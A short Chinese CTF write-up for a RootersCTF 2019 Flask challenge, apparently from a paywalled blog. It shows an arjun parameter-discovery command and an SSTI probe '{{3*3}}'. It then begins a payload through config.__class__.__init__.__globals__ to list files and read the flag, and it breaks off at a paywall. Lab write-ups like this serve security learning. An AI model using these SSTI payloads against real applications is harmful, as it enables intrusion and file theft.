本文详细介绍了在RootersCTF2019中遇到的一个与Flask框架相关的安全问题。通过url参数爆破和服务器端模板注入(SSTI),作者进行了信息收集,利用arjun工具发现参数name,并最终成功获取了当前目录下文件列表,读取到flag。整个过程展示了如何在存在安全漏洞的Flask应用中进行漏洞利用。
知识点
url参数爆破、ssti
信息收集
看了别人的wp,才知道http参数这方面的信息收集
这里使用arjun,当然也可以万能的burpsuite
python3 arjun.py -u http:xxxxxxxxxxx.buuoj.cn/ --get
得到参数name
改成/?name={
{3*3}}
利用和get flag
获取当前目录下文件列表
xxxxx.cn/?name={
{
config.__class__.__init__.__globals__
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
